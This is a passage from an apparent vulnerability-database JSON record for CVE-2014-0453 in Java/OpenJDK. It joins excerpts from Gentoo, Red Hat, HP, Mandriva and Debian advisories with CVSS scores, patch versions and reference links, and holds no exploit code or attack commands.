CVE-2014-4223\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223\n[ 45 ] CVE-2014-4227\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227\n[ 46 ] CVE-2014-4244\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244\n[ 47 ] CVE-2014-4247\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247\n[ 48 ] CVE-2014-4252\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252\n[ 49 ] CVE-2014-4262\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262\n[ 50 ] CVE-2014-4263\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263\n[ 51 ] CVE-2014-4264\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264\n[ 52 ] CVE-2014-4265\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265\n[ 53 ] CVE-2014-4266\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266\n[ 54 ] CVE-2014-4268\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268\n[ 55 ] CVE-2014-4288\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288\n[ 56 ] CVE-2014-6456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456\n[ 57 ] CVE-2014-6457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457\n[ 58 ] CVE-2014-6458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458\n[ 59 ] CVE-2014-6466\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466\n[ 60 ] CVE-2014-6468\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468\n[ 61 ] CVE-2014-6476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476\n[ 62 ] CVE-2014-6485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485\n[ 63 ] CVE-2014-6492\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492\n[ 64 ] CVE-2014-6493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493\n[ 65 ] CVE-2014-6502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502\n[ 66 ] CVE-2014-6503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503\n[ 67 ] CVE-2014-6504\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504\n[ 68 ] CVE-2014-6506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506\n[ 69 ] CVE-2014-6511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511\n[ 70 ] CVE-2014-6512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512\n[ 71 ] CVE-2014-6513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513\n[ 72 ] CVE-2014-6515\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515\n[ 73 ] CVE-2014-6517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517\n[ 74 ] CVE-2014-6519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519\n[ 75 ] CVE-2014-6527\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527\n[ 76 ] CVE-2014-6531\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531\n[ 77 ] CVE-2014-6532\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532\n[ 78 ] CVE-2014-6558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558\n[ 79 ] CVE-2014-6562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201502-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. In a typical operating environment, these are of low\nsecurity risk as the runtime is not used on untrusted applets. Bugs fixed (https://bugzilla.redhat.com/):\n\n1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory)\n1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette\n1051519 - CVE-2014-0428 OpenJDK: insufficient security checks in IIOP streams (CORBA, 8025767)\n1051528 - CVE-2014-0422 OpenJDK: insufficient package access checks in the Naming component (JNDI, 8025758)\n1051699 - CVE-2014-0373 OpenJDK: SnmpStatusException handling issues (Serviceability, 7068126)\n1051823 - CVE-2013-5878 OpenJDK: null xmlns handling issue (Security, 8025026)\n1051911 - CVE-2013-5884 OpenJDK: insufficient security checks in CORBA stub factories (CORBA, 8026193)\n1051912 - CVE-2014-0416 OpenJDK: insecure subject principals set handling (JAAS, 8024306)\n1051923 - CVE-2014-0376 OpenJDK: document builder missing security checks (JAXP, 8027201, 8025018)\n1052915 - CVE-2013-5907 ICU: Layout Engine LookupProcessor insufficient input checks (JDK 2D, 8025034)\n1052919 - CVE-2014-0368 OpenJDK: insufficient Socket checkListen checks (Networking, 8011786)\n1052942 - CVE-2013-5910 OpenJDK: XML canonicalizer mutable strings passed to untrusted code (Security, 8026417)\n1053010 - CVE-2014-0411 OpenJDK: TLS/SSL handshake timing issues (JSSE, 8023069)\n1053066 - CVE-2014-0423 OpenJDK: XXE issue in decoder (Beans, 8023245)\n1053266 - CVE-2013-5896 OpenJDK: com.sun.corba.se. \n\nRelease Date: 2014-08-19\nLast Updated: 2014-08-19\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in Java Runtime\nEnvironment (JRE) and Java Developer Kit (JDK) running on HP-UX. These\nvulnerabilities could allow remote unauthorized access, disclosure of\ninformation, and other vulnerabilities. \n\nReferences:\n\nCVE-2013-6629\n\nCVE-2013-6954\n\nCVE-2014-0432\n\nCVE-2014-0446\n\nCVE-2014-0448\n\nCVE-2014-0449\n\nCVE-2014-0451\n\nCVE-2014-0452\n\nCVE-2014-0453\n\nCVE-2014-0454\n\nCVE-2014-0455\n\nCVE-2014-0456\n\nCVE-2014-0458\n\nCVE-2014-0459\n\nCVE-2014-0460\n\nCVE-2014-0461\n\nCVE-2014-1876\n\nCVE-2014-2397\n\nCVE-2014-2398\n\nCVE-2014-2401\n\nCVE-2014-2402\n\nCVE-2014-2403\n\nCVE-2014-2409\n\nCVE-2014-2412\n\nCVE-2014-2413\n\nCVE-2014-2414\n\nCVE-2014-2420\n\nCVE-2014-2421\n\nCVE-2014-2422\n\nCVE-2014-2423\n\nCVE-2014-2427\n\nCVE-2014-2428\n\nCVE-2014-2483\n\nCVE-2014-2490\n\nCVE-2014-4208\n\nCVE-2014-4209\n\nCVE-2014-4216\n\nCVE-2014-4218\n\nCVE-2014-4220\n\nCVE-2014-4221\n\nCVE-2014-4223\n\nCVE-2014-4244\n\nCVE-2014-4252\n\nCVE-2014-4262\n\nCVE-2014-4263\n\nCVE-2014-4264\n\nCVE-2014-4265\n\nCVE-2014-4266\n\nCVE-2014-4268\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4\nCVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5\nCVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location: http://www.hp.com/java\n\nOS Version\n Release Version\n Depot Name\n\nHP-UX B.11.23, B.11.31\n JDK and JRE v7.0.10 or subsequent\n Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot\n\nMANUAL ACTIONS: Yes - Update\nFor Java v7.0 update to Java v7.0.10 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\nHP-UX B.11.31\n===========\nJdk70.JDK70-COM\nJdk70.JDK70-DEMO\nJdk70.JDK70-IPF32\nJdk70.JDK70-IPF64\nJre70.JRE70-COM\nJre70.JRE70-IPF32\nJre70.JRE70-IPF32-HS\nJre70.JRE70-IPF64\nJre70.JRE70-IPF64-HS\naction: install revision 1.7.0.10.00 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 19 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n \n Note that the CVE-2014-0459 issue is in the lcms2 library, which has\n been patched to correct this flaw. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdfckmqjQ0CJFipgRArKEAKCIiAR2WkLo3Vb0gzzQ5RDz7hQZ3gCcDC6A\n5xOtKkhOvonpLXoqBiAcXWQ=\n=qBk5\n-----END PGP SIGNATURE-----\n. \n\nFor the oldstable distribution (squeeze), these problems have been fixed\nin version 6b31-1.13.3-1~deb6u1. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 6b31-1.13.3-1~deb7u1. \n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 6b31-1.13.3-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 6b31-1.13.3-1", "sources": [ { "db": "NVD", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "126494" }, { "db": "PACKETSTORM", "id": "126631" }, { "db": "PACKETSTORM", "id": "126320" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0453", "trust": 3.5 }, { "db": "SECUNIA", "id": "58415", "trust": 1.8 }, { "db": "SECUNIA", "id": "59307", "trust": 1.8 }, { "db": "SECUNIA", "id": "60580", "trust": 1.8 }, { "db": "SECUNIA", "id": "60117", "trust": 1.8 }, { "db": "SECUNIA", "id": "59082", "trust": 1.8 }, { "db": "SECUNIA", "id": "59255", "trust": 1.8 }, { "db": "SECUNIA", "id": "59438", "trust": 1.8 }, { "db": "SECUNIA", "id": "59675", "trust": 1.8 }, { "db": "SECUNIA", "id": "59071", "trust": 1.8 }, { "db": "SECUNIA", "id": "59104", "trust": 1.8 }, { "db": "SECUNIA", "id": "59324", "trust": 1.8 }, { "db": "SECUNIA", "id": "61050", "trust": 1.8 }, { "db": "SECUNIA", "id": "59722", "trust": 1.8 }, { "db": "SECUNIA", "id": "59250", "trust": 1.8 }, { "db": "SECUNIA", "id": "60574", "trust": 1.8 }, { "db": "SECUNIA", "id": "61264", "trust": 1.8 }, { "db": "SECUNIA", "id": "59194", "trust": 1.8 }, { "db": "SECUNIA", "id": "59023", "trust": 1.8 }, { "db": "SECUNIA", "id": "60498", "trust": 1.8 }, { "db": "SECUNIA", "id": "59653", "trust": 1.8 }, { "db": "SECUNIA", "id": "59022", "trust": 1.8 }, { "db": "SECUNIA", "id": "60003", "trust": 1.8 }, { "db": "SECUNIA", "id": "60111", "trust": 1.8 }, { "db": "SECUNIA", "id": "59436", "trust": 1.8 }, { "db": "SECUNIA", "id": "59733", "trust": 1.8 }, { "db": "JUNIPER", "id": "JSA10698", "trust": 1.8 }, { "db": "BID", "id": "66914", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2014-002089", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201404-268", "trust": 0.7 }, { "db": "VULHUB", "id": "VHN-67946", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-0453", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126182", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126200", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130400", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127655", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127938", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126664", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126494", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126631", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126320", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "126494" }, { "db": "PACKETSTORM", "id": "126631" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "id": "VAR-201404-0374", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-67946" } ], "trust": 0.01 }, "last_update_date": "2024-11-29T22:35:28.945000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HS14-009", "trust": 0.8, "url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-009/index.html" }, { "title": "1672080", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "title": "1681018", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681018" }, { "title": "1673836", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673836" }, { "title": "1679713", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679713" }, { "title": "MIGR-5096132", "trust": 0.8, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096132" }, { "title": "1674539", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674539" }, { "title": "1677387", "trust": 0.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21677387" }, { "title": "1675945", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675945" }, { "title": "1682828", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682828" }, { "title": "1676703", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676703" }, { "title": "1680387", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680387 " }, { "title": "1674530", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674530" }, { "title": "1678113", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678113" }, { "title": "1675588", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675588" }, { "title": "1681256", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681256" }, { "title": "1675343", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675343" }, { "title": "1681047", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681047" }, { "title": "Text Form of Oracle Critical Patch Update - April 2014 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014verbose-1972954.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2014", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "title": "April 2014 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2014_critical_patch_update" }, { "title": "JSA10698", "trust": 0.8, "url": "http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10698\u0026actp=search" }, { "title": "HS14-009", "trust": 0.8, "url": "http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS14-009/index.html" }, { "title": "Oracle Corporation Java\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b", "trust": 0.8, "url": "http://www.fmworld.net/biz/common/oracle/20140417.html" }, { "title": "jdk-7u55-nb-8-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49311" }, { "title": "jdk-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49315" }, { "title": "jre-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49319" }, { "title": "jdk-7u55-nb-8-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49310" }, { "title": "jre-7u55-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49314" }, { "title": "jre-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49318" }, { "title": "jdk-7u55-nb-8-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49309" }, { "title": "jre-7u55-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49313" }, { "title": "jdk-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49317" }, { "title": "jre-7u55-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49312" }, { "title": "jdk-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49316" }, { "title": "jre-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49320" }, { "title": "Red Hat: CVE-2014-0453", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2014-0453" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2187-1" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2191-1" }, { "title": "Amazon Linux AMI: ALAS-2014-326", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2014-326" }, { "title": "Amazon Linux AMI: ALAS-2014-327", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2014-327" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0453" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 1.9, "url": "http://www.securityfocus.com/bid/66914" }, { "trust": 1.9, "url": "http://security.gentoo.org/glsa/glsa-201502-12.xml" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673836" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674539" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675945" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676190" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676373" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676672" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676703" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677294" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678113" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679610" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679713" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680387" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680750" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681018" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681047" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681256" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683484" }, { "trust": 1.8, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096132" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 1.8, "url": 